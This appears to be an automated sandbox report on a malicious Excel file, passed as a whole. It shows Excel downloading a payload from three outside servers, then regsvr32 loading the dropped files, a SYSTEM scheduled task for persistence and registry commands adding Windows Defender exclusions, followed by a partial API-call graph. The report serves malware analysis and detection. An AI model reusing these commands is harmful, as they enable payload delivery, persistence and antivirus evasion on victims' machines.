      Sep 24, 2021 15:59:50.707827091 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707839966 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707854033 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707869053 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707884073 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707895994 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707906961 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707925081 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707947016 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707967997 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.707973957 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.707984924 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.708002090 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.708015919 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.708031893 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.708019018 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.708039045 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.708043098 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.708045959 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.708049059 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.708050966 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.708074093 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.708076000 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.708096981 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.708118916 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.708121061 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.708138943 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.708159924 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.708177090 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 15:59:50.708225965 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 15:59:50.709964991 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 16:00:36.167232037 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 16:00:36.167373896 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 16:00:54.809386969 CEST8049168111.90.148.104192.168.2.22
      Sep 24, 2021 16:00:54.809559107 CEST4916880192.168.2.22111.90.148.104
      Sep 24, 2021 16:00:55.707997084 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 16:00:55.708100080 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 16:01:27.454072952 CEST4916980192.168.2.2251.89.115.111
      Sep 24, 2021 16:01:27.454612017 CEST4916880192.168.2.22111.90.148.104
      Sep 24, 2021 16:01:27.455084085 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 16:01:27.473510981 CEST804916951.89.115.111192.168.2.22
      Sep 24, 2021 16:01:27.641577959 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 16:01:27.673065901 CEST8049168111.90.148.104192.168.2.22

      HTTP Request Dependency Graph

      • 190.14.37.173
      • 111.90.148.104
      • 51.89.115.111

      HTTP Packets

      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
      0 | 192.168.2.22 | 49167 | 190.14.37.173 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Timestamp | kBytes transferred | Direction | Data
      Sep 24, 2021 15:59:27.818121910 CEST | 0 | OUT | GET /44463.6668827546.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 190.14.37.173
      Connection: Keep-Alive
      Sep 24, 2021 15:59:28.861392021 CEST | 1 | IN | HTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 24 Sep 2021 13:59:28 GMT
      Content-Type: application/octet-stream
      Content-Length: 495616
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44463.6668827546.dat"


      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
      1 | 192.168.2.22 | 49168 | 111.90.148.104 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Timestamp | kBytes transferred | Direction | Data
      Sep 24, 2021 15:59:31.410495043 CEST | 519 | OUT | GET /44463.6668827546.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 111.90.148.104
      Connection: Keep-Alive
      Sep 24, 2021 15:59:32.366945982 CEST | 520 | IN | HTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 24 Sep 2021 13:59:32 GMT
      Content-Type: application/octet-stream
      Content-Length: 495616
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44463.6668827546.dat"


      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
      2 | 192.168.2.22 | 49169 | 51.89.115.111 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Timestamp | kBytes transferred | Direction | Data
      Sep 24, 2021 15:59:49.888041019 CEST | 1040 | OUT | GET /44463.6668827546.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 51.89.115.111
      Connection: Keep-Alive
      Sep 24, 2021 15:59:50.080285072 CEST | 1042 | IN | HTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 24 Sep 2021 13:59:50 GMT
      Content-Type: application/octet-stream
      Content-Length: 495616
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44463.6668827546.dat"


      System Behavior

      General

      Start time:16:00:15
      Start date:24/09/2021
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Imagebase:0x13f6d0000
      File size:28253536 bytes
      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      General

      Start time:16:00:42
      Start date:24/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Fiosa.der
      Imagebase:0xff170000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:16:00:42
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Fiosa.der
      Imagebase:0x5d0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      General

      Start time:16:01:09
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0x220000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:16:01:10
      Start date:24/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Fiosa1.der
      Imagebase:0xff170000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:16:01:11
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\schtasks.exe
      Wow64 process (32bit):true
      Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtirgcvnp /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:03 /ET 16:15
      Imagebase:0xfc0000
      File size:179712 bytes
      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:16:01:11
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Fiosa1.der
      Imagebase:0x1e0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      General

      Start time:16:01:13
      Start date:24/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32.exe -s 'C:\Users\user\Fiosa.der'
      Imagebase:0xff170000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:16:01:13
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -s 'C:\Users\user\Fiosa.der'
      Imagebase:0x1e0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      General

      Start time:16:01:36
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0x220000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:16:01:37
      Start date:24/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Fiosa2.der
      Imagebase:0xff170000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:16:01:38
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Fiosa2.der
      Imagebase:0x1e0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:16:01:39
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0x220000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:16:01:41
      Start date:24/09/2021
      Path:C:\Windows\System32\reg.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Frdsfsne' /d '0'
      Imagebase:0xff440000
      File size:74752 bytes
      MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:16:01:42
      Start date:24/09/2021
      Path:C:\Windows\System32\reg.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Ltnurpxor' /d '0'
      Imagebase:0xff930000
      File size:74752 bytes
      MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:16:02:02
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0x220000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:16:03:00
      Start date:24/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32.exe -s 'C:\Users\user\Fiosa.der'
      Imagebase:0xff850000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:16:03:00
      Start date:24/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -s 'C:\Users\user\Fiosa.der'
      Imagebase:0x660000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Disassembly

      Code Analysis

        Execution Graph

        Execution Coverage:5.7%
        Dynamic/Decrypted Code Coverage:100%
        Signature Coverage:8.6%
        Total number of Nodes:1362
        Total number of Limit Nodes:25

        Graph

11711->11733 11713 1000f9d2 11715 1000fabc 11713->11715 11720 1000fb10 11713->11720 11734 1000109a 11713->11734 11718 1000861a 2 API calls 11715->11718 11717 100095e1 HeapAlloc 11719 1000fa2c 11717->11719 11718->11720 11721 100092e5 2 API calls 11719->11721 11720->11606 11722 1000fa49 11721->11722 11723 1000a6a9 3 API calls 11722->11723 11724 1000fa56 11723->11724 11725 100085d5 2 API calls 11724->11725 11726 1000fa62 11725->11726 11727 100085d5 2 API calls 11726->11727 11730 1000fa6b 11727->11730 11728 1000861a 2 API calls 11729 1000fab1 11728->11729 11731 1000861a 2 API calls 11729->11731 11730->11728 11731->11715 11732->11709 11733->11713 11735 10008531 HeapAlloc 11734->11735 11736 100010b5 11735->11736 11736->11717 11740 10009f95 11737->11740 11741 10009fbe 11740->11741 11752 10009b0e 11741->11752 11743 10005de2 11743->11614 11743->11617 11744 10009fc9 11744->11743 11755 1000be9b 11744->11755 11746 1000a095 11747 1000861a 2 API calls 11746->11747 11747->11743 11748 1000a070 11750 1000861a 2 API calls 11748->11750 11749 10009ffd 11749->11746 11749->11748 11751 10008669 HeapAlloc 11749->11751 11750->11746 11751->11748 11759 10008604 HeapAlloc 11752->11759 11754 10009b1a 11754->11744 11756 1000bec1 11755->11756 11758 1000bec5 11756->11758 11760 10008604 HeapAlloc 11756->11760 11758->11749 11759->11754 11760->11758 11762 10005917 11761->11762 11763 1000591c 11761->11763 11762->11625 11764 10005934 GetLastError 11763->11764 11765 1000593f GetLastError 11763->11765 11764->11762 11765->11762 11767 10009f7c 11766->11767 11782 1000a0ab 11767->11782 11770 1000b1b1 SetFileAttributesW memset 11771 1000b1ec 11770->11771 11772 1001242d _ftol2_sse 11771->11772 11781 1000b1ff 11771->11781 11773 1000b21b 11772->11773 11774 10009640 2 API calls 11773->11774 11775 1000b22c 11774->11775 11776 100092e5 2 API calls 11775->11776 11777 1000b23d 11776->11777 11777->11781 11797 1000b0de 11777->11797 11780 1000861a 2 API calls 11780->11781 11781->11635 11783 1000a0c8 11782->11783 11787 
10005c08 11782->11787 11784 1001242d _ftol2_sse 11783->11784 11783->11787 11785 1000a112 11784->11785 11796 10008604 HeapAlloc 11785->11796 11787->11635 11787->11770 11788 1000a126 11788->11787 11789 100122d3 _ftol2_sse 11788->11789 11790 1000a168 11789->11790 11791 10009b0e HeapAlloc 11790->11791 11794 1000a1b4 11791->11794 11792 1000a21e 11793 1000861a 2 API calls 11792->11793 11793->11787 11794->11792 11795 1000861a 2 API calls 11794->11795 11795->11792 11796->11788 11798 1000b101 11797->11798 11799 1000b109 memset 11798->11799 11808 1000b178 11798->11808 11800 100095e1 HeapAlloc 11799->11800 11801 1000b125 11800->11801 11802 1001242d _ftol2_sse 11801->11802 11803 1000b141 11802->11803 11804 10009640 2 API calls 11803->11804 11805 1000b157 11804->11805 11806 100085d5 2 API calls 11805->11806 11807 1000b160 MoveFileW 11806->11807 11807->11808 11808->11780 11809->11643 11921 10001080 11810->11921 11815 100085c2 2 API calls 11816 10005ab7 11815->11816 11817 10005af7 11816->11817 11818 10001080 HeapAlloc 11816->11818 11817->11647 11819 10005ac5 11818->11819 11931 10008910 11819->11931 11822 10005ae1 11824 100085c2 2 API calls 11822->11824 11825 10005aeb 11824->11825 11826 1000861a 2 API calls 11825->11826 11826->11817 11828 10004d91 11827->11828 11829 10004de7 11827->11829 11831 100095c7 HeapAlloc 11828->11831 11830 1000b7a8 10 API calls 11829->11830 11841 10004e1d 11829->11841 11832 10004dfc 11830->11832 11833 10004d9b 11831->11833 11834 1000a86d 5 API calls 11832->11834 11835 100095c7 HeapAlloc 11833->11835 11836 10004e08 11834->11836 11837 10004dab 11835->11837 12027 1000a471 11836->12027 11837->11829 11840 10004db9 GetModuleHandleA 11837->11840 11839 10004e14 11839->11841 11844 1000e1bc 6 API calls 11839->11844 11842 10004dc6 GetModuleHandleA 11840->11842 11843 10004dcd 11840->11843 11841->11648 11842->11843 11846 100085c2 2 API calls 11843->11846 11845 10004e37 11844->11845 11847 100095e1 HeapAlloc 11845->11847 11848 10004dde 11846->11848 11850 10004e48 
11847->11850 11849 100085c2 2 API calls 11848->11849 11849->11829 11851 100092e5 2 API calls 11850->11851 11852 10004e60 11851->11852 11853 100085d5 2 API calls 11852->11853 11855 10004e73 11853->11855 11854 10004e9c 11857 1000861a 2 API calls 11854->11857 11855->11854 12032 1000896f 11855->12032 11859 10004ead 11857->11859 11858 10004e8f 11858->11854 11861 1000a2e3 6 API calls 11858->11861 12052 10004a0b memset 11859->12052 11861->11854 11864 100095e1 HeapAlloc 11866 100051fd 11864->11866 11867 100092e5 2 API calls 11866->11867 11873 10005215 11867->11873 11868 10005245 11870 100085d5 2 API calls 11868->11870 11869 1000e2c6 42 API calls 11871 10004f64 11869->11871 11872 10005251 lstrcpynW lstrcpynW 11870->11872 11874 10004fb3 11871->11874 11879 10005082 11871->11879 11906 100051f1 11871->11906 11875 10005296 11872->11875 11873->11868 11876 1000861a 2 API calls 11873->11876 11881 10004fbc 11874->11881 11874->11906 11877 1000861a 2 API calls 11875->11877 11876->11868 11878 100052a8 11877->11878 11880 1000861a 2 API calls 11878->11880 11879->11906 12126 1000fc1f 11879->12126 11880->11841 12121 10008604 HeapAlloc 11881->12121 11885 10005006 11885->11841 11887 100095e1 HeapAlloc 11885->11887 11888 1000501f 11887->11888 11890 10009640 2 API calls 11888->11890 11889 10005110 11892 1000109a HeapAlloc 11889->11892 11889->11906 11891 10005052 11890->11891 11893 100085d5 2 API calls 11891->11893 11894 10005129 11892->11894 11895 1000505c 11893->11895 11896 1000902d _ftol2_sse 11894->11896 12122 1000a911 memset 11895->12122 11898 1000514b 11896->11898 12137 100060df 11898->12137 11901 1000861a 2 API calls 11901->11841 11903 100051e2 11904 1000861a 2 API calls 11903->11904 11904->11906 11905 10009640 2 API calls 11907 100051ba 11905->11907 11906->11864 11908 100085d5 2 API calls 11907->11908 11909 100051c4 11908->11909 11910 1000a911 2 API calls 11909->11910 11911 100051d6 11910->11911 11912 1000861a 2 API calls 11911->11912 11912->11903 11915 1000a3ad 11913->11915 11920 
10005bb5 11913->11920 11914 1000a3d2 11917 1000861a 2 API calls 11914->11917 11915->11914 11916 1000861a 2 API calls 11915->11916 11916->11915 11918 1000a3dd 11917->11918 11919 1000861a 2 API calls 11918->11919 11919->11920 11920->11652 11922 100084ab HeapAlloc 11921->11922 11923 10001096 11922->11923 11924 1000a51a 11923->11924 11925 1000a538 11924->11925 11926 1001242d _ftol2_sse 11925->11926 11930 10005aa7 11925->11930 11927 1000a552 FindResourceA 11926->11927 11927->11925 11928 1000a580 11927->11928 11929 10008669 HeapAlloc 11928->11929 11928->11930 11929->11930 11930->11815 11932 10005ad4 11931->11932 11933 1000891f 11931->11933 11932->11822 11939 1000a2e3 11932->11939 11950 10008604 HeapAlloc 11933->11950 11935 10008929 11935->11932 11951 10008815 11935->11951 11938 1000861a 2 API calls 11938->11932 11986 10008a90 11939->11986 11943 1000a397 11943->11822 11944 1000a38f 12001 10008cc0 11944->12001 11947 1000a2fd 11947->11943 11947->11944 11948 10008698 3 API calls 11947->11948 11992 10009749 11947->11992 11997 100091a6 11947->11997 11948->11947 11950->11935 11961 10008604 HeapAlloc 11951->11961 11953 100088d6 11954 1000861a 2 API calls 11953->11954 11955 10008837 11953->11955 11954->11955 11955->11932 11955->11938 11956 1000882a 11956->11953 11956->11955 11962 1000ebf0 11956->11962 11959 100088f0 11960 1000861a 2 API calls 11959->11960 11960->11955 11961->11956 11977 10008604 HeapAlloc 11962->11977 11964 1000ec14 11965 1000ed7f 11964->11965 11978 10008604 HeapAlloc 11964->11978 11968 1000861a 2 API calls 11965->11968 11967 1000ec2c 11967->11965 11979 10008604 HeapAlloc 11967->11979 11969 1000eda5 11968->11969 11971 1000861a 2 API calls 11969->11971 11972 1000edb3 11971->11972 11973 100088cf 11972->11973 11974 1000861a 2 API calls 11972->11974 11973->11953 11973->11959 11974->11973 11975 1000ec42 11975->11965 11980 10008698 11975->11980 11977->11964 11978->11967 11979->11975 11985 10008604 HeapAlloc 11980->11985 11982 100086d5 11982->11975 11983 100086ad 
11983->11982 11984 1000861a 2 API calls 11983->11984 11984->11982 11985->11983 11987 10008ab3 11986->11987 11988 10008604 HeapAlloc 11987->11988 11989 10008be7 11987->11989 11990 1000861a 2 API calls 11987->11990 11988->11987 11991 10008604 HeapAlloc 11989->11991 11990->11987 11991->11947 11993 1000974b 11992->11993 11994 10009780 SetLastError 11993->11994 11995 1000978c SetLastError 11993->11995 11996 10009799 11994->11996 11995->11996 11996->11947 11999 100091b1 11997->11999 12000 100091c7 11997->12000 12013 10008604 HeapAlloc 11999->12013 12000->11947 12002 10008d57 12001->12002 12004 10008ccf 12001->12004 12002->11943 12003 10008d09 12005 10008d19 12003->12005 12014 10008de5 12003->12014 12004->12002 12004->12003 12006 1000861a 2 API calls 12004->12006 12008 10008d34 12005->12008 12009 1000861a 2 API calls 12005->12009 12006->12004 12010 10008d4a 12008->12010 12012 1000861a 2 API calls 12008->12012 12009->12008 12011 1000861a 2 API calls 12010->12011 12011->12002 12012->12010 12013->12000 12021 10008604 HeapAlloc 12014->12021 12016 10008e28 12016->12005 12017 10008e1e 12017->12016 12019 10008e61 12017->12019 12022 1000879d 12017->12022 12020 1000861a 2 API calls 12019->12020 12020->12016 12021->12017 12023 1001242d _ftol2_sse 12022->12023 12026 100087b6 12023->12026 12024 100087e3 12024->12019 12025 1001242d _ftol2_sse 12025->12026 12026->12024 12026->12025 12028 1000a485 12027->12028 12029 1000a495 GetLastError 12028->12029 12030 1000a48b GetLastError 12028->12030 12031 1000a4a2 12029->12031 12030->12031 12031->11839 12147 10008604 HeapAlloc 12032->12147 12034 10008990 12035 100089a1 lstrcpynW 12034->12035 12043 1000899a 12034->12043 12036 10008a14 12035->12036 12037 100089c4 12035->12037 12148 10008604 HeapAlloc 12036->12148 12038 1000a6a9 3 API calls 12037->12038 12040 100089d0 12038->12040 12042 10008a39 12040->12042 12044 10008815 3 API calls 12040->12044 12041 10008a1f 12041->12042 12041->12043 12047 1000861a 2 API calls 12041->12047 12046 10008a61 
12042->12046 12049 1000861a 2 API calls 12042->12049 12043->11858 12045 100089ea 12044->12045 12045->12041 12048 100089f0 12045->12048 12050 1000861a 2 API calls 12046->12050 12047->12042 12051 1000861a 2 API calls 12048->12051 12049->12046 12050->12043 12051->12043 12053 10004a41 12052->12053 12054 10004a76 12053->12054 12149 10002ba4 12053->12149 12055 1000b7a8 10 API calls 12054->12055 12066 10004ae2 12054->12066 12057 10004a8d 12055->12057 12058 1000b67d 4 API calls 12057->12058 12059 10004a9d 12058->12059 12165 100049c7 12059->12165 12061 10004aa7 12062 1000b88a 4 API calls 12061->12062 12063 10004acd 12062->12063 12176 10002c8f 12063->12176 12066->11906 12116 1000e2c6 12066->12116 12067 100092e5 2 API calls 12069 10004af8 12067->12069 12068 10004b5e 12070 10004b65 12068->12070 12071 10004bc6 12068->12071 12069->12068 12073 100095e1 HeapAlloc 12069->12073 12074 10004b4c 12069->12074 12245 1000c292 12070->12245 12075 100091e3 HeapAlloc 12071->12075 12077 10004b24 12073->12077 12074->12068 12238 1000e286 12074->12238 12079 10004bcf 12075->12079 12210 1000bfec 12077->12210 12081 100091e3 HeapAlloc 12079->12081 12082 10004bc2 12081->12082 12087 10009b43 8 API calls 12082->12087 12084 10004b99 12088 1000861a 2 API calls 12084->12088 12085 10004bae 12090 1000861a 2 API calls 12085->12090 12086 100085d5 2 API calls 12086->12074 12089 10004bfa 12087->12089 12088->12066 12089->12066 12254 10009f48 12089->12254 12090->12082 12093 10009f6c 4 API calls 12094 10004c1f 12093->12094 12095 1000a0ab 4 API calls 12094->12095 12096 10004c41 12095->12096 12097 10004c52 12096->12097 12258 1000a3ed 12096->12258 12099 10004c60 12097->12099 12101 1000a3ed 7 API calls 12097->12101 12100 1000980c GetSystemTimeAsFileTime 12099->12100 12102 10004c67 12100->12102 12101->12099 12103 1000a0ab 4 API calls 12102->12103 12106 10004c82 12103->12106 12104 10004cd8 12271 100052c0 12104->12271 12105 1000fc1f 8 API calls 12105->12106 12106->12104 12106->12105 12266 1000553f 12106->12266 12110 
10004d4d lstrcpyW 12110->12066 12111 10004d0e 12112 1000109a HeapAlloc 12111->12112 12113 10004d18 lstrcpyW 12112->12113 12114 100085d5 2 API calls 12113->12114 12115 10004d2f lstrcatW lstrcatW lstrcatW 12114->12115 12115->12066 12117 1000e2fa 12116->12117 12119 10004f40 12117->12119 12318 10008604 HeapAlloc 12117->12318 12319 10004905 12117->12319 12119->11869 12119->11871 12121->11885 12123 1000a943 12122->12123 12124 1000506e 12123->12124 12125 1000a98a GetExitCodeProcess 12123->12125 12124->11901 12125->12124 12127 1000fc43 12126->12127 12128 100050fa 12126->12128 12129 10008669 HeapAlloc 12127->12129 12128->11906 12136 10008604 HeapAlloc 12128->12136 12130 1000fc4d 12129->12130 12130->12128 12131 100060df 4 API calls 12130->12131 12135 1000fc8e 12130->12135 12133 1000fcac 12131->12133 12132 1000861a 2 API calls 12132->12128 12133->12135 12378 1000f7e3 12133->12378 12135->12132 12136->11889 12138 100060ea 12137->12138 12139 10005168 12137->12139 12413 10008604 HeapAlloc 12138->12413 12139->11903 12139->11905 12141 100060f4 12141->12139 12142 1000109a HeapAlloc 12141->12142 12143 1000610b 12142->12143 12144 100092e5 2 API calls 12143->12144 12145 1000612c 12144->12145 12146 100085d5 2 API calls 12145->12146 12146->12139 12147->12034 12148->12041 12150 10002bc0 12149->12150 12151 1000109a HeapAlloc 12150->12151 12164 10002c5c 12150->12164 12152 10002bd3 12151->12152 12153 100092e5 2 API calls 12152->12153 12154 10002be5 12153->12154 12155 100085d5 2 API calls 12154->12155 12156 10002bf0 12155->12156 12157 1000109a HeapAlloc 12156->12157 12158 10002bfa 12157->12158 12283 1000bf37 12158->12283 12161 100085d5 2 API calls 12162 10002c16 12161->12162 12163 1000861a 2 API calls 12162->12163 12163->12164 12164->12054 12166 10009256 2 API calls 12165->12166 12167 100049d2 12166->12167 12168 100095e1 HeapAlloc 12167->12168 12169 100049e1 12168->12169 12170 100092e5 2 API calls 12169->12170 12171 100049ed 12170->12171 12172 100085d5 2 API calls 12171->12172 12173 100049f8 
